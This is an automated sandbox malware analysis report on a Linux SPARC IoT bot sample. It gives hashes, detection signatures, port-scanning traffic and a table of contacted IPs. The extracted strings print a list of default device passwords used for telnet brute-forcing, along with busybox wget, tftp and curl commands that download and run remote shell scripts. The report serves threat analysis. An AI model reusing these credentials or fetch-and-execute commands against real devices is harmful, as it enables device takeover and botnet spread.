Linux Analysis Report
la.bot.sparc.elf

Overview

General Information

Sample name:	la.bot.sparc.elf
Analysis ID:	1540692
MD5:	39cd762fd6ab9367e0bc8cb9f789d9f9
SHA1:	1c581559c4537fb75c80b7a87b30d523de937c53
SHA256:	950bd1cad6c4482d188773323cc9d0cf72118281392f4b0723616634cf32b48d
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Connects to many ports of the same IP (likely port scanning)

Detected TCP or UDP traffic on non-standard ports

Executes the "rm" command used to delete files or directories

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: la.bot.sparc.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: la.bot.sparc.elf

ReversingLabs: Detection: 34%

Found strings indicative of a multi-platform dropper

Source: la.bot.sparc.elf	String: ash\|login\|wget\|curl\|tftp\|ntpdate
Source: la.bot.sparc.elf	String: /proc//exe\|ash\|login\|wget\|curl\|tftp\|ntpdate/fd/dev/null\|/dev/consolesocket\|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc//maps/lib//dev/watchdog/dev/misc/watchdog
Source: la.bot.sparc.elf	String: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- \| sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/tmp//var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 103.253.147.242 ports 23789,2,3,7,8,9

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.23:49742 -> 103.253.147.242:23789

Sample listens on a socket

Source: /tmp/la.bot.sparc.elf (PID: 6241)

Socket: 127.0.0.1:1234

Jump to behavior

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 115.221.48.135
Source: unknown	TCP traffic detected without corresponding DNS query: 3.86.149.121
Source: unknown	TCP traffic detected without corresponding DNS query: 115.221.48.135
Source: unknown	TCP traffic detected without corresponding DNS query: 9.162.4.110
Source: unknown	TCP traffic detected without corresponding DNS query: 3.86.149.121
Source: unknown	TCP traffic detected without corresponding DNS query: 3.114.204.146
Source: unknown	TCP traffic detected without corresponding DNS query: 9.162.4.110
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 128.147.149.239
Source: unknown	TCP traffic detected without corresponding DNS query: 3.114.204.146
Source: unknown	TCP traffic detected without corresponding DNS query: 146.181.123.146
Source: unknown	TCP traffic detected without corresponding DNS query: 128.147.149.239
Source: unknown	TCP traffic detected without corresponding DNS query: 146.181.123.146
Source: unknown	TCP traffic detected without corresponding DNS query: 13.253.255.203
Source: unknown	TCP traffic detected without corresponding DNS query: 13.253.255.203
Source: unknown	TCP traffic detected without corresponding DNS query: 163.76.216.172
Source: unknown	TCP traffic detected without corresponding DNS query: 205.243.208.204
Source: unknown	TCP traffic detected without corresponding DNS query: 163.76.216.172
Source: unknown	TCP traffic detected without corresponding DNS query: 14.2.157.157
Source: unknown	TCP traffic detected without corresponding DNS query: 205.243.208.204
Source: unknown	TCP traffic detected without corresponding DNS query: 48.144.176.157
Source: unknown	TCP traffic detected without corresponding DNS query: 113.33.101.109
Source: unknown	TCP traffic detected without corresponding DNS query: 14.2.157.157
Source: unknown	TCP traffic detected without corresponding DNS query: 48.144.176.157
Source: unknown	TCP traffic detected without corresponding DNS query: 186.31.157.134
Source: unknown	TCP traffic detected without corresponding DNS query: 158.12.179.64
Source: unknown	TCP traffic detected without corresponding DNS query: 113.33.101.109
Source: unknown	TCP traffic detected without corresponding DNS query: 186.31.157.134
Source: unknown	TCP traffic detected without corresponding DNS query: 93.175.23.40
Source: unknown	TCP traffic detected without corresponding DNS query: 158.12.179.64
Source: unknown	TCP traffic detected without corresponding DNS query: 119.194.5.90
Source: unknown	TCP traffic detected without corresponding DNS query: 93.175.23.40
Source: unknown	TCP traffic detected without corresponding DNS query: 113.196.23.98
Source: unknown	TCP traffic detected without corresponding DNS query: 119.194.5.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.184.24.204
Source: unknown	TCP traffic detected without corresponding DNS query: 113.196.23.98
Source: unknown	TCP traffic detected without corresponding DNS query: 151.38.218.215
Source: unknown	TCP traffic detected without corresponding DNS query: 5.184.24.204
Source: unknown	TCP traffic detected without corresponding DNS query: 139.227.35.223
Source: unknown	TCP traffic detected without corresponding DNS query: 128.97.12.152
Source: unknown	TCP traffic detected without corresponding DNS query: 151.38.218.215
Source: unknown	TCP traffic detected without corresponding DNS query: 139.227.35.223
Source: unknown	TCP traffic detected without corresponding DNS query: 81.130.225.143
Source: unknown	TCP traffic detected without corresponding DNS query: 223.161.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 128.97.12.152
Source: unknown	TCP traffic detected without corresponding DNS query: 123.233.91.212
Source: unknown	TCP traffic detected without corresponding DNS query: 81.130.225.143
Source: unknown	TCP traffic detected without corresponding DNS query: 215.31.215.8
Source: unknown	TCP traffic detected without corresponding DNS query: 223.161.239.146
Source: unknown	TCP traffic detected without corresponding DNS query: 158.236.249.146

Source: la.bot.sparc.elf	String found in binary or memory: http:///curl.sh
Source: la.bot.sparc.elf	String found in binary or memory: http:///wget.sh

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample	String containing 'busybox' found: /wget.sh -O- \| sh;/bin/busybox tftp -g
Source: Initial sample	String containing 'busybox' found: -r tftp.sh -l- \| sh;/bin/busybox ftpget
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sample	String containing 'busybox' found: (usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sample	String containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- \| sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/tmp//var//var/

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal60.troj.linELF@0/0@0/0

Executes the "rm" command used to delete files or directories

Source: /usr/bin/dash (PID: 6220)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.MmAZb2pPGC /tmp/tmp.O9axEUqqLy /tmp/tmp.PgVEO2aX3H			Jump to behavior
Source: /usr/bin/dash (PID: 6229)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.MmAZb2pPGC /tmp/tmp.O9axEUqqLy /tmp/tmp.PgVEO2aX3H			Jump to behavior

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/la.bot.sparc.elf (PID: 6241)

Queries kernel information via 'uname':

Jump to behavior

Source: la.bot.sparc.elf, 6241.1.00005604f04de000.00005604f0569000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sparc
Source: la.bot.sparc.elf, 6241.1.00005604f04de000.00005604f0569000.rw-.sdmp	Binary or memory string: V!/etc/qemu-binfmt/sparc
Source: la.bot.sparc.elf, 6241.1.00007ffe61959000.00007ffe6197a000.rw-.sdmp	Binary or memory string: H*6nUex86_64/usr/bin/qemu-sparc/tmp/la.bot.sparc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.sparc.elf
Source: la.bot.sparc.elf, 6241.1.00007ffe61959000.00007ffe6197a000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
2.10.8.29	unknown	France	3215	FranceTelecom-OrangeFR	false
15.89.46.88	unknown	United States	13979	ATT-IPFRUS	false
203.101.40.138	unknown	India	24560	AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServices	false
37.20.131.220	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
55.153.178.226	unknown	United States	1541	DNIC-ASBLK-01534-01546US	false
116.147.184.133	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
207.57.33.214	unknown	United States	2914	NTT-COMMUNICATIONS-2914US	false
208.212.73.255	unknown	United States	701	UUNETUS	false
12.28.135.70	unknown	United States	7018	ATT-INTERNET4US	false
186.189.54.95	unknown	Aruba	11816	SetarNetAW	false
206.38.158.195	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
190.237.121.195	unknown	Peru	6147	TelefonicadelPeruSAAPE	false
31.115.212.190	unknown	United Kingdom	12576	EELtdGB	false
75.22.81.33	unknown	United States	7018	ATT-INTERNET4US	false
82.104.168.186	unknown	Italy	3269	ASN-IBSNAZIT	false
200.250.209.206	unknown	Brazil	4230	CLAROSABR	false
81.6.26.139	unknown	Switzerland	1836	GREENgreenchAGAutonomousSystemEU	false
129.84.168.211	unknown	United States	792	ORACLE-ASNBLOCK-ASNUS	false
133.60.60.239	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
37.21.121.112	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
177.62.126.163	unknown	Brazil	26599	TELEFONICABRASILSABR	false
27.200.159.35	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
164.230.183.78	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
98.46.251.26	unknown	United States	7922	COMCAST-7922US	false
221.50.91.232	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
220.6.116.122	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
19.117.204.14	unknown	United States	3	MIT-GATEWAYSUS	false
61.70.37.232	unknown	Taiwan; Republic of China (ROC)	9416	MULTIMEDIA-AS-APHoshinMultimediaCenterIncTW	false
164.44.228.186	unknown	United States	63111	ACE-US	false
153.229.1.209	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
215.175.140.145	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
79.21.13.214	unknown	Italy	3269	ASN-IBSNAZIT	false
99.57.136.4	unknown	United States	7018	ATT-INTERNET4US	false
38.81.126.117	unknown	United States	22742	CT-EDU-NETUS	false
212.91.140.142	unknown	Sweden	29468	INFRACOMSE	false
38.79.86.221	unknown	United States	397525	ALPHAONE-ASUS	false
118.124.188.10	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
32.15.233.90	unknown	United States	2686	ATGS-MMD-ASUS	false
210.45.63.97	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
67.224.247.36	unknown	Puerto Rico	10396	COQUI-NETPR	false
218.209.89.129	unknown	Korea Republic of	23563	VITSSEN-SUWON-AS-KRTbroadSuwonBroadcastingCorporationK	false
85.112.60.21	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
68.203.208.133	unknown	United States	11427	TWC-11427-TEXASUS	false
154.28.148.132	unknown	United States	174	COGENT-174US	false
94.72.179.80	unknown	Bulgaria	42735	MAXTELECOM-ASBG	false
31.199.207.79	unknown	Italy	3269	ASN-IBSNAZIT	false
16.170.232.203	unknown	United States	unknown	unknown	false
223.24.239.90	unknown	Thailand	7470	TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH	false
150.198.180.225	unknown	United States	53352	HFHS-ASNUS	false
16.60.116.41	unknown	United States	unknown	unknown	false
115.225.0.1	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
48.72.1.106	unknown	United States	2686	ATGS-MMD-ASUS	false
157.3.239.231	unknown	Japan	7671	MCNETNTTSmartConnectCorporationJP	false
135.108.204.97	unknown	United States	10455	LUCENT-CIOUS	false
90.148.230.80	unknown	Saudi Arabia	25019	SAUDINETSTC-ASSA	false
109.26.250.23	unknown	France	15557	LDCOMNETFR	false
198.221.61.253	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
128.61.243.4	unknown	United States	2637	GEORGIA-TECHUS	false
162.187.22.170	unknown	United States	21928	T-MOBILE-AS21928US	false
23.86.11.197	unknown	United States	395954	LEASEWEB-USA-LAX-11US	false
16.159.247.175	unknown	United States	unknown	unknown	false
109.136.124.184	unknown	Belgium	5432	PROXIMUS-ISP-ASBE	false
154.88.173.215	unknown	Seychelles	54600	PEGTECHINCUS	false
192.117.120.147	unknown	Israel	8551	BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL	false
132.100.216.95	unknown	United States	306	DNIC-ASBLK-00306-00371US	false
188.177.57.114	unknown	Denmark	3292	TDCTDCASDK	false
115.244.44.161	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
138.249.57.145	unknown	Finland	8426	CLARANET-ASClaraNETLTDGB	false
162.152.37.53	unknown	United States	10796	TWC-10796-MIDWESTUS	false
159.239.157.167	unknown	United Kingdom	14977	STATE-OF-WYOMING-ASNUS	false
4.139.68.225	unknown	United States	3356	LEVEL3US	false
20.170.115.47	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
177.240.1.150	unknown	Mexico	13999	MegaCableSAdeCVMX	false
75.252.1.199	unknown	United States	22394	CELLCOUS	false
158.61.41.251	unknown	United States	46196	RCIT-CORNETUS	false
219.99.225.15	unknown	Japan	59108	KATCH-NETKATCHNETWORKINCJP	false
131.77.230.127	unknown	United States	5974	DNIC-ASBLK-05800-06055US	false
223.129.191.253	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
207.95.58.129	unknown	United States	7029	WINDSTREAMUS	false
105.36.137.180	unknown	Egypt	37069	MOBINILEG	false
151.152.154.87	unknown	United States	11687	CITY-OF-HOPEUS	false
142.6.100.224	unknown	Canada	46606	UNIFIEDLAYER-AS-1US	false
179.219.28.120	unknown	Brazil	28573	CLAROSABR	false
125.122.217.245	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
1.97.220.108	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
107.177.38.36	unknown	United States	40676	AS40676US	false
133.89.113.137	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
86.236.61.149	unknown	France	3215	FranceTelecom-OrangeFR	false
42.54.33.53	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
191.219.7.130	unknown	Brazil	8167	BrasilTelecomSA-FilialDistritoFederalBR	false
50.66.211.8	unknown	Canada	6327	SHAWCA	false
204.67.230.239	unknown	United States	1761	TDIR-CAPNETUS	false
16.248.16.163	unknown	United States	unknown	unknown	false
119.54.139.117	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
123.255.242.102	unknown	Japan	10001	MICSNETMicsNetworkCorporationJP	false
79.126.80.123	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
21.3.96.84	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
152.88.164.70	unknown	Switzerland	559	SWITCHPeeringrequestspeeringswitchchEU	false
133.51.25.185	unknown	Japan	37917	UTINSUniversityofTsukubaJP	false
112.153.117.17	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false

ID:	1540692
Product:	CloudBasic
Start time:	01:07:03
Start date:	24.10.2024
Sample:	la.bot.sparc.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	39cd762fd6ab9367e0bc8cb9f789d9f9
SHA1:	1c581559c4537fb75c80b7a87b30d523de937c53
SHA256:	950bd1cad6c4482d188773323cc9d0cf72118281392f4b0723616634cf32b48d
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Linux Analysis Report
la.bot.sparc.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Screenshots

Network Map

Contacted Public IPs

Linux Analysis Report la.bot.sparc.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Screenshots

Network Map

Contacted Public IPs

Linux Analysis Report
la.bot.sparc.elf